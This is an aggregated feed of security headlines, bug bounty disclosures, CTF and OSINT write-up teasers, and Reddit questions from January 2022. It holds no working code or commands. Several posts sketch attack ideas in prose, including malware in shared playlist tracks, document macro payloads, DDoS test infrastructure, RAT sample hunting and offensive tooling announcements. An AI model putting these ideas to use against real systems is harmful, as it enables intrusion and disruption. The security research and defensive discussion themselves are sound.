    Assume you have a work laptop given to you with a remote software that’s installed to give IT monitoring and troubleshooting access. What are some best practices for separating your work and personal stuff when using the work laptop? Should you avoid logging into things like your personal google account, Bank accounts, etc? Does this make it possible for someone in IT possibly with bad intent to also have access to your other devices in your network? If so, best practices to avoid such breaches? I assume you never want to login into your other computers shared drives from your work computer which will give access to every file on your personal computer that’s shared. I’m curious what is the extent of monitoring that a normal corporate workplace does on the computer? I always assumed they can see my screen at any time, all key strokes are logged. But this makes me uncomfortable in the event that there’s a breach, hack, or bad employee who can cause lots of damage. Thoughts on this matter? Anyone familiar with kaseya software for monitoring? submitted by /u/RasAlTimmeh [link] [comments]  ( 1 min )
  • Open

    Beginner Bug Bounty Guide - Part 2
    Previous: Beginner Bug Bounty Guide - Part 1 Continue reading on Medium »  ( 1 min )
    Bug Fix Update: TribeOne dApp is Ready to Take NFT Space by Storm
    Our dApp is getting closer and closer to perfection as we work hard to achieve the best possible user experience. Continue reading on Medium »  ( 2 min )
    Kenobi Walkthrough | TryHackMe | Explained | Part 1
    Goals: Enumerate Samba for shares, manipulate a vulnerable version of proftpd Continue reading on Medium »  ( 3 min )
    Malicious file upload leads to off-domain XSS
    Hello Everyone, Continue reading on Medium »  ( 1 min )
    Demystifying JA3: One Handshake at a Time
    Recently, I was browsing a website with BurpSuite and found out that the website was blocking my requests. In the pursuit of unlocking the… Continue reading on InfoSec Write-ups »  ( 6 min )
  • Open

    GoWard - A robust Red Team proxy written in Go
    submitted by /u/UnwearableCactus [link] [comments]
    CVE-2021-45467: CWP CentOS Web Panel – preauth RCE
    submitted by /u/Gallus [link] [comments]
  • Open

    Case in modern communist destabilization of Ukrainian-Poland relations
    Case provides overview of 5 year long activity of former Ukrainian citizen in Poland, conducting provocations and communist propaganda in… Continue reading on Medium »  ( 13 min )
    Quiztime — Random OSINT Challenge 5
    On Jan 14, 2022, Quiztime (contributor @dondude) shared a new OSINT quiz with us. The objective was fairly simple. We had to figure out… Continue reading on Medium »  ( 3 min )
    OSINT Challenge — On the road to Estonia
    In December 2021 the OSINT Dojo invited the community to solve a traditional image-based geolocation OSINT challenge. They have asked for… Continue reading on Medium »  ( 2 min )
  • Open

    SecWiki News 2022-01-22 Review
    No news updates today. For more of the latest articles, visit SecWiki  ( 2 min )
  • Open

    Buffer Overflow in optimized_escape_html method
    Internet Bug Bounty disclosed a bug submitted by chamal: https://hackerone.com/reports/1455248 - Bounty: $1200
    xss reflected on imgur.com
    Imgur disclosed a bug submitted by whoami991: https://hackerone.com/reports/1058427 - Bounty: $100
  • Open

    Android Pentesting-Intents
    When doing a black box pentesting for android , apart for looking at root detection bypass and ssl pinning looking for intents are also… Continue reading on Medium »  ( 2 min )
  • Open

    A collection of 8mm family videos from the 60's that have been digitized and restored
    submitted by /u/HGMIV926 [link] [comments]  ( 3 min )
  • Open

    OSS authors: “We need to understand your mitigation plans for this vulnerability”
    Article URL: https://twitter.com/bagder/status/1484672924036616195 Comments URL: https://news.ycombinator.com/item?id=30035651 Points: 68 # Comments: 11  ( 1 min )
    CVE-2022-0185: Detecting Linux Kernel vulnerability causing container escape
    Article URL: https://sysdig.com/blog/cve-2022-0185-container-escape/ Comments URL: https://news.ycombinator.com/item?id=30034914 Points: 18 # Comments: 0  ( 5 min )
  • Open

    CVE-2021-45467: CWP CentOS Web Panel – Preauth RCE
    Article URL: https://octagon.net/blog/2022/01/22/cve-2021-45467-cwp-centos-web-panel-preauth-rce/ Comments URL: https://news.ycombinator.com/item?id=30035247 Points: 1 # Comments: 0  ( 3 min )
  • Open

    Demystifying JA3: One Handshake at a Time
    Recently, I was browsing a website with BurpSuite and found out that the website was blocking my requests. In the pursuit of unlocking the…  ( 6 min )
  • Open

    Employee Access to Data
    This is largely for those who work in, have worked in, or have worked with a SOC. For this example, there is a SOC that has tiers of analysts, with lower level analysts performing basic tasks and escalating alerts to the upper level analysts. The lower level analysts serve more of a traffic cop type of role; they weed out the easily spotted false-positives and may start very basic reviews of true positive events before handing off to the higher level analysts for analysis. In this setup, all members of the SOC have full access to M365 (all mailboxes, all OneDrives). This is in addition to the ability to triage machines via an EDR tool and collect files through that tool. My question: is that type of access appropriate for the lower level analysts? The obvious concern is that it is excessive data for the role they are performing (including any especially since the position has fairly high turnover. What are your thoughts? submitted by /u/ebarboza311 [link] [comments]  ( 2 min )
    digital forensics software bypass encryption
    How does forensics software extract files from password protected iPhones? submitted by /u/thecirclingfly [link] [comments]  ( 1 min )
    Old iPhone SE
    I have an old iPhone SE I think. Somebody tried logging in a bunch of times and locked out forever basically. So I connected to iTunes and it told me to update it so I did just in case it gives me a chance to try again and now it says phone unavailable. And not lock screen. So am I screwed because it's extremely important to get the videos and photos from there. submitted by /u/TushieandTush [link] [comments]  ( 1 min )

  • Open

    CVE-2022-0185: Detecting and mitigating Linux Kernel vulnerability causing container escape
    submitted by /u/MiguelHzBz [link] [comments]
    The best free, open-source supply-chain security tool? The lockfile
    submitted by /u/pabloest [link] [comments]  ( 1 min )
    Captain Hook - How (not) to look for vulnerabilities in Java applications
    submitted by /u/Gallus [link] [comments]
  • Open

    I need an advice
    Hi, I can choose among 3 internships as a computer science student. I really want to land a job in cybersecurity but right now I need to build up my CV and finish my degree. The 3 internships are: Automation Software Engineer (you have to validate portions of software implementations for Communication Service Providers based on established engineering principles and in accordance with provided specifications and requirements, help evolving our telecommunication focused product, build demonstrations of product use cases help to prepare collaterals to explain technical product capabilities, software architectures and features, build automated test scripts to analyse test data to verify requirements compliance) Internship Program for Information Science or Telco Engineer (you have to participate to a project delivery for assigned tasks, that may include performing analysis and design of a IT or Telco Solution, SW Development, systems configurations, troubleshooting systems errors/problems, monitoring and/or testing systems performance, and contribute to the design of technical solutions for customer environments, work under supervision of technical lead and with customer nominated representatives to accomplish assigned tasks) Automated Assurance Artificial Intelligence & Machine Learning Engineer (validate portions of software implementations for Communication Service Providers based on established engineering principles and in accordance with provided specifications and requirements, develop and extend the coverage of current test automation, build automated test scripts to analyse test data to verify requirements compliance, work on small independent software and system integration projects to augment internal work). As you can see they are intertwined, but I would guess the 2nd one could be more cybersec-oriented (for the telco part). What do you think? Any advice is appreciated. submitted by /u/Danyderossi [link] [comments]  ( 2 min )
    Switching From IT Audit
    Hello, I work in IT audit and I would like to have a more operational/hands-on role within an IT department. The problem is that I don't have any experience dealing directly with IT work. How would you recommend I go about transitioning from IT audit to a more technical role? Any certifications or skillsets you would recommend I obtain? I was thinking IT Security would probably be the best fit, given most of my audits are involved with IT security, patch management, or mobile device security. submitted by /u/DapperDandy22 [link] [comments]  ( 1 min )
    Payloads in Word/PDF documents: Is this still a thing?
    I read about this being used to hack computers recently. Are most computers still vulnerable to this? Payload=malicious file that could potentially create a backdoor that runs in the document when you enable macros (most people are not cognizant of this possibility). An article I read tested this successfully on a Windows machine running Outlook that defaulted to Adobe to read the PDF. I noticed in GMail that docs and PDFs aren't opened on the computer, but read in a window. Does this prevent payload execution? Anyways, I'd like to know if this is still a thing and why? Why can't Adobe or Microsoft build their applications to not allow this? submitted by /u/anon314159265358p [link] [comments]  ( 3 min )
    Red team Operator to security strategy consultant
    Hi all, I am currently working for a big four firm (US) as a red team member. I am thinking to switch to the broader sense of security to see more parts such as security strategy/security officer/architect roles. Many people see red teaming as the most fun job & I agree it is awesome. However, Red team is only smart part of the equation. Who has made the leap and switched to a strategy role as a pentester/red team? What was your experience in the new role? submitted by /u/TechnicalCiso [link] [comments]  ( 2 min )
    Taking on new role as Security Architect. Advice? Tips? Considerations? Anything welcome!
    As the title states, taking on a new role as a Security Architect for a predominantly Windows hybrid cloud/on-prem environment that hosts quite a few web servers. I am very comfortable with the deployment and configuration of hardened endpoints, SIEMs (Splunk & ELK), network segregation, backup and restoration, and authoring most relevant policy and procedure as it relates to NIST 800-53. My understanding is that I am one of 2 "cybersecurity" specialists and will be responsible for documenting, developing, and configuring the entire security architecture from the ground up. I've been told that MFA has been enforced at 100% compliance. I am not however familiar with securing a hybrid environment, and don't have a ton of experience managing firewalls. How should I approach the discovery/recon aspect of becoming familiar with a new network? After getting my bearings and a detailed depiction of the current architecture, I plan to first tackle the backup and restoration processes to ensure ransomware resistance. Then address any glaring weak points. Anything to help a brother out? submitted by /u/UnderZinfluence [link] [comments]  ( 4 min )
    Likelihood of embedding malicious code in music streaming services?
    To the Red Teamers: imagine this, I use a music streaming service, I have some playlists that me and my friends collaborate on, this playlist has enabled "automatic download" so whenever a track is added it is also automatically downloaded to my device. Now take this further, you embed malicious code to tracks, and upload them to the music service, and then my friend adds this track with malicious code to the playlist, and bam! I got the file on my systems. Now add the fact that when you open a playlist to collaboration, it opens this playlist for everyone to add tracks. Sure, to hack the major providers of this service is going to be hard, but the small band/label/producer that uploads the tracks to the service, classic supply chain. And the bad actor can just browse around for open playlists and add these "bad" tracks and now you got the file to the device. So to what degree is this a likely attack vector? Is it at all feasible? Because you got plenty of versions for different OS with likely exploits available. I at least was quite surprised to find a playlist of mine, with a lot of new music I didn't recognize for a user I had not shared my playlist with. And was sitting at work and thought, "this is most likely an overlooked tool to use" so should one be worried about these "auto sync/download" a bit like Dropbox, but here it is open to everyone/the world. At least I block the unsanctioned cloud storage services, while permitting the web part at work, so when you download stuff via web it's scanned and checked by our EDR, where I worry about the apps with auto sync and all that. So should I block Spotify, Tidal, SoundCloud [insert service here] apps as well? submitted by /u/Uli-Kunkel [link] [comments]  ( 3 min )
    Startup Asking for SSN in a Google Form
    I worked for a small startup during the summer of 2021. There were several things that came up during the internship that made me feel the company was not one that I would stand behind, and they didn't know what they were doing. They paid me hourly, but they never set up an employment contract that they promised. They never collected my tax info. Suddenly, within the last two days they have sent me several messages asking me to fill out a Google Form so they can complete the 1099's. The form is just straight up all the most sensitive information: full legal name, address, email & phone, SSN. (1) I'm not sure how secure it would be to send an SSN over a Google form, so I haven't done it yet. (2) I know that the form will result in a Google Sheet that has all of the employees' info, and I'm not sure if the company will keep that secure or delete it, but it weirds me out thinking that there might indefinitely be a Google form out there with my SSN and other personal info, and they'll forget about it when the company inevitably goes defunct. (3) I'm not sure what other secure method I can suggest, to get them this information so they can send the 1099. submitted by /u/ImpressiveAirport4 [link] [comments]  ( 2 min )
    Anyone surprised about the lack of fundamental knowledge in network security? Not enough forward engineering knowledge it seems.
    There seems to be a surprising lack of fundamental knowledge in network security. Has anyone else felt the same? Here are some examples working with different teams: Work heavily with Kibana servers, but lacked fundamental database knowledge. You would think someone managing a cluster would at least understand the basics of distributed systems. Heavily use SIEMs, but could not tell you the concept of an operating system process beyond "Yeah, it's a program that executes." A serious lack of web development knowledge. A lot of people entering the field claiming they are knowledgeable in network security, but can't forward engineer a basic CRUD app, and yet they'll claim they know how to reverse engineer it and secure it. Yeah, you're able to successfully complete a basic SQL injection hackthebox, but you could barely construct a SQL query yourself. You just blindly put in a SQL query and hope you get back an error saying the web application is vulnerable and then blindly put in another SQL query. submitted by /u/me_hungry_and_sad [link] [comments]  ( 4 min )
  • Open

    Cyber Investigator OSINT CTF “Cyber Crime” Writeup
    The Cyber Society at Cardiff University runs the Cyber Investigator CTF, a free CTF with OSINT and forensics challenges. Continue reading on Medium »  ( 4 min )
    First Blog…
    This is my first ever blog. Blogging is not something I ever thought I’d end up doing, but to obtain #OSINTDojo ranks & badges there are… Continue reading on Medium »  ( 6 min )
    Urgent! Poles are threatening the well-known journalist Igor Isaev!
    The well-known Zaporizhzhia journalist Igor Isaev faces 3 years in prison in Poland. Who did this? Continue reading on Medium »  ( 10 min )
    Windows Shell — Discovery Stage
    Sometimes you don’t always need a Meterpreter shell. Depending on the intent, Netcat might be all you need. The benefit being that Windows… Continue reading on Medium »  ( 5 min )
    Using Open Source Intelligence (OSINT)
    Recently, Netflix’s ‘The Great Hack’ has sparked a lot of interest around data privacy. The documentary covers Cambridge Analytica and how… Continue reading on Medium »  ( 7 min )
  • Open

    hosted.weblate.org display of unfiltered results
    Weblate disclosed a bug submitted by joshmcman08: https://hackerone.com/reports/1454552
    Email change or personal data change on the account.
    Stripe disclosed a bug submitted by dk82hg: https://hackerone.com/reports/1250037 - Bounty: $3000
    [https://app.recordedfuture.com] - Reflected XSS via username parameter
    Recorded Future disclosed a bug submitted by bombon: https://hackerone.com/reports/1201134 - Bounty: $300
    disclosing clients' secret keys https://stage-uapi.tochka.com:2000/
    QIWI disclosed a bug submitted by rivalsec: https://hackerone.com/reports/1419205 - Bounty: $150
  • Open

    Duplicating USB drives
    Good day all, I feel my question is on the border of Computer forensics, but I believe still pertinent. I do not come from a background in IT, and have been figuring this all out on my own in the past few years. I have acquired a set (x3) of USB drives to collect images and videos from clients' phones in an easier way. I have added the exact nomenclature of what I have below. I need this to be done in a forensically sound manner, and I am currently going through the steps to validate my theory these collect data in a forensically sound manner. To be forensically sound any media should be "zeroed" or wiped prior to use. Herein lies my question. With these flash drives they obviously have some sort of proprietary software which makes them work. If I were to format these I would lose this proprietary software. What would be a way I could format these drives and then return them to "manufacturer settings"? I have looked into USB duplicators, not sure if this could be a forensically sound option. Also, they seem too expensive to acquire for my organization currently. USB in question: MFi Certified 128GB Photo-Stick for iPhone-USB-Flash-Drives External Storage Stick for USB C iPhone-Thumb-Drive Memory-Mobile-for-Android-Phones iPad-Flash-Drive Photo Transfer Stick submitted by /u/Unfair-Border8865 [link] [comments]  ( 3 min )
    Unexplained WAN traffic to private subnet ranges
    While investigating a remote intrusion warning I noticed HTTP traffic from two separate devices communicating with private IP subnet ranges that do not belong to any of our routers, or other devices. All of the traffic is to port 80. Example IPs include: 10.50.60.15 10.80.80.112 209.54.181.102 All the above are reserved private ranges and the aforementioned traffic was observed on two different routers, but using the same Verizon modem. Anyone seen this before, or can explain? There are no VPNs in use, or similar service. Log submitted by /u/keeny-fn-pawers [link] [comments]  ( 1 min )
    SQLite query repository?
    Does anyone know of any repositories (sites, blogs, etc) where people can post and look for SQLite queries? There are times when the best tools in the world can’t parse what you want and I thought it would be a great resource if there were queries others had done and shared cataloged somewhere. If you know of any, or any good sites, drop them below! submitted by /u/acw750 [link] [comments]  ( 1 min )
    Forensic script ideas?
    Hello all, I have no programming experience, I can use command line and get around in Linux but I would like to make practical things the community would find useful. There are so many good scripts and tools out there but what is a missing tool that you would like to have? I would like to build the script/program in Python, Go or C#. I am looking for some ideas that you think a beginner would be able to tackle that would have some value to others. submitted by /u/AgitatedSecurity [link] [comments]  ( 2 min )
  • Open

    SecWiki News 2022-01-21 Review
    Automated penetration testing: an in-depth analysis of the DeepExploit framework by ourren. For more of the latest articles, visit SecWiki  ( 2 min )
  • Open

    Simple CTF- TryHackme
    CTF Continue reading on System Weakness »  ( 2 min )
    Hashing the Favicon.ico
    Hey Folks, I am Ski Mask and I recently started bug bounty. in this Write-up, I will tell you about one of my findings!! Continue reading on Medium »  ( 1 min )
    Multi XSS Exploit in Upload File
    Hello amazing hunters, Today I want to notice 4 ways to find XSS in file upload that I found all of them in bug bounty programs or pentest… Continue reading on System Weakness »  ( 2 min )
    Cronos Theft of Transactions Fees Bugfix Postmortem
    Transactions in blockchain are like sound traveling through air. We communicate with others through transactions; we announce what we’re… Continue reading on Immunefi »  ( 4 min )
    Nakji Network launches a 200K USD Bug Bounty Program
    Singapore, 21st January 2022 — The Nakji Foundation (‘Nakji’) is launching a 200K USD Bug Bounty program for developers and security… Continue reading on Sentinel Protocol »  ( 3 min )
    Top 10 web hacking techniques of 2021 — PortSwigger
    OK, I will gradually translate all of the methods; you can see the original here: “‘Top 10 web hacking techniques of 2021 —… Continue reading on Medium »  ( 1 min )
  • Open

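    Thoughts on which commands are suitable for vulnerability detection
    You often need to send a request and observe the response, using the response to judge whether a command executed. So which kind of command works best?  ( 1 min )
    FreeBuf Morning News | Indonesia's central bank hit by ransomware attack, 13GB of data leaked; upheaval in Twitter's security team as former executives depart
    Peiter Zatko, head of Twitter's security department, has left the company; he was formerly the well-known hacker “Mudge” in the security community. Chief Information Security Officer Rinki Sethi will leave in the coming weeks.  ( 1 min )
    Cisco StarOS vulnerabilities may pose remote code execution and information disclosure risks
    Cisco recently announced that it has patched a remote code execution vulnerability.
    FreeBuf Enterprise Private Salon · Shanghai Finance Night event successfully held
    On the afternoon of January 15, the first “Enterprise Private Salon · Shanghai Finance Night” event, initiated by FreeBuf, a Chinese cybersecurity industry portal, was successfully held in Shanghai.
    FreeBuf Weekly | Well-known subtitle site Opensubtitles breached by hackers; China's first cybersecurity industry service short number launched
    We summarize and recommend this week's top news, quality articles and handy tools, so that you don't miss any of this week's highlights!  ( 1 min )
    ASRC 2021 email security trends in review
    In the post-pandemic era, everyone is gradually adapting to remote work; deploying information security equipment is no longer just a hurried response to the security risks of remote work, but an adaptive deployment of an entirely new kind  ( 1 min )
    2021 annual report on targeted ransomware attack activity
    Ransomware attacks are already one of the biggest threats to cybersecurity, having evolved from an early online nuisance into a new, continually escalating global challenge that endangers the functioning of society, economic stability and public safety.  ( 1 min )
    Case closed: REvil ransomware group arrested
    On the 14th, Russian authorities announced arrests of the REvil ransomware group  ( 1 min )
    2021 cybersecurity regulation roundup: major regulations keep landing, data security meets new opportunities
    Overall, 2021 was the year the digital economy took off, the year cybersecurity developed comprehensively and in depth, and also the year of comprehensive, in-depth regulation of the data sector.  ( 1 min )
    Freebuf Enterprise Group topic discussion | Let's talk about enterprise cybersecurity over the holidays
    Spring Festival is approaching, which is no small test for enterprise security. As the last topic discussion before the new year, we'd like everyone to talk about how to safeguard enterprise cybersecurity during the holidays.  ( 1 min )
    Analysis of the 2021 SCTF Flying-kernel challenge
    This challenge can be solved by escalating privileges in several ways to obtain the flag. The solution in this article leans toward Glibc-style exploitation techniques, with a kernel arbitrary-address write; it is not the intended solution, but it gives rise to more exploitation ideas, and those interested can debug it themselves.  ( 3 min )
    FreeBuf Cybersecurity Chronicle | 2021 roundup of vulnerability exploitation incidents
    Let's look back and take stock of the 30 vulnerability exploitation incidents of 2021 that affected the industry and even society as a whole.  ( 1 min )
    “Information security technology - Guidelines for cost measurement of cybersecurity services” (draft for comment) released
    The Guidelines apply to activities carried out by both providers and buyers of cybersecurity services, such as cybersecurity service cost budgeting, project bidding and tendering, project final accounting, and drafting of related contracts.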
  • Open

    Lessons from the Log4j crisis: Are we ready for the next global vulnerability?
    Were you prepared for Log4Shell? These lessons learned will help your organization respond more efficiently to the next global vulnerability crisis. READ MORE  ( 3 min )
    What to know about Biden’s latest cybersecurity memorandum
    The Biden Administration’s new memorandum on National Security aims to improve security posture for intelligence and defense agencies. Here’s what you need to know. READ MORE  ( 2 min )
  • Open

    RedRabbit — Offensive PowerShell
    RedRabbit is the twin of BlueRabbit however, RedRabbit has more offensive scripts. RedRabbit was created to help conduct ethical… Continue reading on Medium »  ( 3 min )
  • Open

    A modern, elastic design for Burp Collaborator server
    When we launched Burp Collaborator back in 2015, PortSwigger deployed a public Collaborator server that anyone could use. This meant that OAST testing with Burp Collaborator was able to work straight  ( 4 min )
  • Open

    Security vulnerability in Rust standard library
    Article URL: https://blog.rust-lang.org/2022/01/20/cve-2022-21658.html Comments URL: https://news.ycombinator.com/item?id=30023615 Points: 64 # Comments: 37  ( 2 min )
    DNS Vulnerability, Configuration Errors That Can Cause DDoS
    Article URL: https://labs.ripe.net/author/giovane_moura/dns-vulnerability-configuration-errors-that-can-cause-ddos/ Comments URL: https://news.ycombinator.com/item?id=30021239 Points: 1 # Comments: 0  ( 7 min )
  • Open

    Tons of software to Try and Buy :-)
    https://soft.uclv.edu.cu/ submitted by /u/Appropriate-You-6065 [link] [comments]  ( 1 min )

  • Open

    Invalid handling of X509_verify_cert() internal errors in libssl (CVE-2021-4044)
    Internet Bug Bounty disclosed a bug submitted by tniessen: https://hackerone.com/reports/1455411 - Bounty: $1200
    Reflected XSS online-store-git.shopifycloud.com
    Shopify disclosed a bug submitted by bepresent: https://hackerone.com/reports/1410459 - Bounty: $3500
    Direct Access To admin Dashboard
    Shopify disclosed a bug submitted by mester_x: https://hackerone.com/reports/1421804 - Bounty: $500
    Stored XSS at https://linkpop.com
    Shopify disclosed a bug submitted by nagli: https://hackerone.com/reports/1441988 - Bounty: $1600
    Cross-site Scripting (XSS) - Stored on ads.tiktok.com in Text field
    TikTok disclosed a bug submitted by lu3ky-13: https://hackerone.com/reports/1376961 - Bounty: $999
  • Open

    Does anyone know what "gaia_account_name" means specifically in the context of a Google Duo database table?
    I couldn't find much at all, but I feel like "gaia" has some connotation like mother/creator/origin, and thus "gaia_account_name" means the account name of the user that setup Google Duo on the device. Any progress toward certainty is greatly appreciated. submitted by /u/PieWithIceCreamCrust [link] [comments]  ( 1 min )
    I hosted a webinar for HTCIA last week about providing effective expert witness testimony - here’s the recording!
    submitted by /u/Monolith_Pro [link] [comments]  ( 1 min )
    Effective imaging/cloning large disk
    Hi there. Is there a most effective way of imaging very large disks (over 2 terabytes)? The next challenge is when doing the automated analysis (I'm using Autopsy), is there a more effective (fastest) way to do this? I once analyzed a 1 TB disk using Autopsy and it took more than 1 week to complete (the computer specification: CPU i7 6th Gen, RAM 32GB, imaging results on SSD, and using type C connector) EDIT 1: Thank you for all of your feedback. I can't afford a TX1 or any licensed tool (hardware or software based) at the moment. Using the open source tool is preferred. However, I am also open to any licensed hardware or software suggestions. The only licensed hardware that I use is the WiebeTech write blocker. I'm using Autopsy for automated analysis (some ingest modules were used such as hashing, web artifacts, keyword search, and Plaso) and CAINE for manual analysis. submitted by /u/modpr0be [link] [comments]  ( 3 min )
  • Open

    Log4j RCE When Remote Class File Won’t Load (Newer Java Versions)
    So you might have heard of the log4j vulnerability (lol). If you’ve read the initial proof of concepts/general information that rushed out… Continue reading on Medium »
    Collecting parameters with BURP SUITE!
    The reconnaissance phase is the most important one when we are analyzing a “target”, and parameter collection can change the course of your… Continue reading on Medium »  ( 2 min )
    Early bed bug stains on sheets
    Bedbugs are a real threat to your sleep quality. These small, oval, and brown animals at night eat our blood at night. If you wake up with… Continue reading on Medium »  ( 3 min )
    My First Blind XSS
    Disclaimer Continue reading on Medium »  ( 2 min )
    Facebook room deep linking vulnerability, allow malicious user to know the code for anyone’s…
    Title Facebook room deep linking vulnerability, allow malicious user to know the code for anyone’s meeting. Continue reading on Medium »  ( 2 min )
    Bug Bounty Methodology — Bug Hunting Checklist(PART-2)
    Hello people, it’s me again. I apologize for being late about the second part. I had some examinations going on and have been busy for the… Continue reading on Medium »  ( 2 min )
    XYZ of XSS
    Hello Ninjas! Today I am going to share everything(Almost Everything :P) that I know about Cross-site Scripting vulnerabilities. I would… Continue reading on Medium »  ( 4 min )
    PORTSWIGGER WEB SECURITY - AUTHENTICATION LAB SOLUTIONS
    Authentication, one of the most important parts of web applications, is the process of verifying the identity of a particular user or client… Continue reading on Medium »  ( 17 min )
    How I Hacked into Pune University’s Exam/Teachers Portal
    Bypassing the Authentication mechanism results in an amazing Account takeover. Continue reading on Medium »  ( 4 min )
    Nakji Network’s 200K Bug Bounty Program
    The Nakji Foundation Continue reading on Medium »  ( 2 min )
  • Open

    Big Tech advertiser friendliness and SEO garbage.
    This is potentially a bit off-topic for this sub, but hopefully well within scope for the users: Feels like search results are full of complete nonsense (I've moved from google to qwant about a year ago, which was good at first, but now seems to be getting worse) and individual mainstream websites are constantly banning creators and removing content that's otherwise useful but potentially unfriendly to advertisers. This is just a loose feeling that the internet is getting worse every day, I'm wondering if there is any pushback against this and if it's possible to get an experience closer to 10-15 years ago when it didn't feel like a dystopian hellscape was rapidly approaching. Are corporate friendly walled gardens going to be the future of the internet? Is this going to be preferred when search engines lose the arms race against SEO spam? Is the sky actually falling? submitted by /u/TwinkyTheBear [link] [comments]  ( 1 min )
    Any love for Carbon Black EDR?
    CB Advanced is $30/device. SentinelOne Control is $31/device. CB gives me a process tree/timeline of the attack. S1 requires Complete to do that, about $60/device. I've been quoted $2,500 for VMware to help setup my policies so it's set and forget. I read a lot of hate on here about CB being too noisy. Also a decent amount of hate for S1. CrowdStrike seems to be the favorite but it's $70-80/device, so wanting CB or S1. Which one would you go with? 200 devices, so small environment. Upgrading from Webroot, so anything is better. submitted by /u/JeepMunkee [link] [comments]  ( 2 min )
    Which cloud IaS service for DDoS tests?
    Hello, we are a small pentesting firm and want to include (small-scale, short-term!) "DDoS" tests in our portfolio (only whitehat tests with full permission, simple stuff such as SYN floods, TLS flooding, slow loris). Our last cloud VPS vendor was ok with it first, but withdrew their permission to use their boxes for any kind of DDoS testing after a number of successful tests. Maybe it was just a nervous employee - but it is a problem for us if we cannot fulfill our obligations to our customers if the cloud vendor suddenly cuts our service. => We are thus looking for a reliable and trustworthy cloud IaS (VPS) provider for small scale DDoS tests: Up to a 100 virtual servers at a time (starting with 1, then adding servers until saturation is given or the target system passes the test without service reduction) API for instantiating/provisioning and starting/stopping the boxes, executing scripts Reasonable network connection - but volumetric DDoS testing is only the smallest part of our test suite Central to Eastern European area preferred Only whitehat tests with full permission, reputable business Only short bursts in the magnitude of minutes (until our monitor sensor recognizes service degradation in the target) Can you recommend cloud VPS vendors which are OK with such small-scale, short-term DDoS tests? Thank you very much! Dany submitted by /u/thrownetsecddos [link] [comments]  ( 1 min )
    What is this presumed phishing email trying to accomplish?
    The only thing I can think of is they are trying to get me to call the 888-number in the message. Simple Order is restaurant software, I don't work in a restaurant and they wouldn't have iPads. The address at the bottom in California is a house. There is no Durham in NY that I can find (the ship to). Paypal is clean. What am I missing? There are no links, no pictures or attachments I can find. I sanitized my name (which was correct) and my email address, everything else is from the original raw email. Please let me know if you need anything else to help figure out what's happening here. Thanks! Received: from 10.217.151.75 by atlas212.free.mail.ne1.yahoo.com with HTTPS; Thu, 20 Jan 2022 15:49:18 +0000 Return-Path: X-Originating-Ip: [209.85.166.178] Rec…  ( 5 min )
    Help with Masters Thesis :) Python RAT Malware Samples
    Hey everyone, I am currently in the process of completing my dissertation which involves creating my own Python malware to test some free anti-virus solutions and software. For the dissertation/thesis I need to find some samples of RAT malware written in Python to analyse. I have managed to find a couple but ideally I need a good website/resource that has a database of them. Any help would be great, many thanks! submitted by /u/DJ0x [link] [comments]  ( 2 min )
    Home network abused for brute force ssh attacks
    Hi, an interesting security incident occurred at my home and I would greatly appreciate advice on how to proceed. A few days ago, my HBO service was blocked on all my devices connected to my home WiFi (yet worked outside the network), which was quite interesting and after a few calls to HBO support I finally got the information that they actively blocked my IP address due to malicious activity occurring from my IP that was reported in a public database. After some googling I found out that this must be the https://www.abuseipdb.com/ where my IP address really was reported (38x) for categories: "Port Scan", "Hacking", "Brute force", "SSH". I checked the reports in detail and it seems that all attacks were done via SSH and they were trying to log into different websites using different user name…  ( 5 min )
    Where do you draw the line between legal and illegal?
    I've been a jr pentester for a few months and was wondering right before you get the green light to pentest a web application and you have spare time at work and decide to gather some information, what is your approach? I can find some emails of the company and check with what tools the web app was built. But whenever I do subdomain scraping with amass or sublist3r or other frameworks the firewall is always signaling. I have absolutely no intention to do something illegal and get in trouble neither me nor the company. Where do you draw the line which act is legal and illegal? I also want to get into bug bounty programs, but I am afraid because of the same reason. When doing do you use any proxies or other stuff? How do you basically stay safe (keep some anonymity) even for whitehat, when doing this job. submitted by /u/tryingtoworkatm [link] [comments]  ( 4 min )
    What's more lucrative: black hat or white hat hacking?
    submitted by /u/anon314159265358p [link] [comments]  ( 1 min )
  • Open

    Using Go to Develop Offensive Tooling
    With better Security Tooling, that can easily detect PowerShell and C# Offensive Tooling, Red Teamers have to adapt their offensive capabilities. Go is a statically linked programming language which can be easily cross-compiled and needs no installation dependencies. This makes it perfect for Red Teamers. This great talk describes how Golang can be used in an offensive way: https://youtu.be/AGLunpPtOgM submitted by /u/_R4bb1t_ [link] [comments]  ( 1 min )
    MoonBounce: the dark side of UEFI firmware
    submitted by /u/dmchell [link] [comments]
  • Open

    Exnoscan
    Exnoscan is a simple bash script that can help you identify gaps. We often monitor what we know, so Exnoscan aims to identify what you… Continue reading on Medium »  ( 2 min )
    Cyber Detective OSINT CTF “Evidence Investigation” Writeup
    The Cyber Society at Cardiff University runs Cyber Detective CTF, a free OSINT CTF. Continue reading on Medium »  ( 7 min )
    Doing OSINT with Google LENS
    Today I bring you a new article, in which I decided to address one topic in particular, taking advantage of one of my greatest… Continue reading on Medium »  ( 4 min )
    GEOINT and SOCMINT in Investigations
    A few days ago I read an article by Mr. Diaz Caneja, in which the author highlights very well the scope of social media intelligence and the… Continue reading on Medium »  ( 3 min )
    The new paradigms of investigation: CRIMINT and social media analytics in the face of digitalization
    To begin talking about these new paradigms, we must first understand this terminology so as to make our… Continue reading on Medium »  ( 4 min )
    “YOU”, a series that shows us the vulnerability of our information on social networks
    Netflix released a new series that shows us the importance of our data; in the story, a young man becomes obsessed with a woman and… Continue reading on Medium »  ( 3 min )
    Quiztime — Random OSINT Challenge 4
    On Jan 7, 2022, Quiztime (contributor @fiete_stegers) shared a new OSINT quiz with us. The objective was, weird :). We had to figure out… Continue reading on Medium »  ( 1 min )
    Quiztime — Random OSINT Challenge 3
    On Jan 5, 2022, Quiztime (contributor @twone2) shared a new OSINT quiz with us. The objective was, weird :). We had to figure out what was… Continue reading on Medium »  ( 1 min )
    Quiztime — Random OSINT Challenge 2
    On Jan 1, 2022, a regular Quiztime and contributor @bayer_julia shared a new OSINT quiz with us. The objective was, simple. We had to… Continue reading on Medium »  ( 2 min )
    Quiztime — Random OSINT Challenge 1
    On December 29, 2021, Quiztime (contributor @ twone2) shared a new OSINT quiz with us. The objective was, for me at least not very simple… Continue reading on Medium »  ( 2 min )
  • Open

    A Detailed Analysis of WhisperGate Targeting Ukrainian Organizations
    submitted by /u/CyberMasterV [link] [comments]
    Pentest Collaboration Framework: tool which will help you to store/modify/share information about pentest/web analysis projects. OpenSource, Portable, CrossPlatform & completely free! Supports integration with 15 tools & user-defined report generation. For several teams: separated workspaces!
